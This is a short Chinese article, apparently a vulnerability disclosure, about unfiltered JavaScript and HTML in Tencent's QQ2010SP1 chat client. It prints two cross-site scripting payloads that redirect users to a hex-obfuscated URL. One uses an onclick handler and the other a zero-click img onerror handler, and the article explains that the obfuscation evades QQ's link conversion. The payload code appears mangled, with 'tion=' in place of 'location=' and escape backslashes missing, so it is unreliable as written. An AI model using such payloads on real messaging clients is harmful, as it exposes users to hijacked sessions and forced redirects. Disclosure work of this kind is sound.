騰訊QQ一向是騰訊主打的產品,意想不到前天釋出的QQ2010SP1竟然有如此大漏洞。使用者可以隨意在訊息中使用Javascript、Html,騰訊並沒有對此進行有效的遮蔽,如此低階漏洞,在QQ這樣的軟體中出現實屬罕見。
截止發稿之日起,騰訊還沒有對此漏洞給出解決辦法,網友只有去下載試用QQ2010正式版來避免此問題。
點選下載:QQ2010SP1正式版
首先囧一下:指令碼出錯還會提示錯誤
1、訊息記錄的Javascript、Html標籤沒有遮蔽
2、訊息盒子Javascript、Html標籤沒有遮蔽
3、小實驗
1、傳送程式碼:<input onclick="tion=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’" />
因為騰訊會自動將url轉換,我們必須混淆url才能傳送
4、超牛程式碼
<img src=’tetet’ onerror="tion=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’"/>
因為要點選才能觸發,想到一個不用點選就能觸發的程式碼。
5、希望騰訊快點修復,這個漏洞非同小可
6、本漏洞由TGL發現。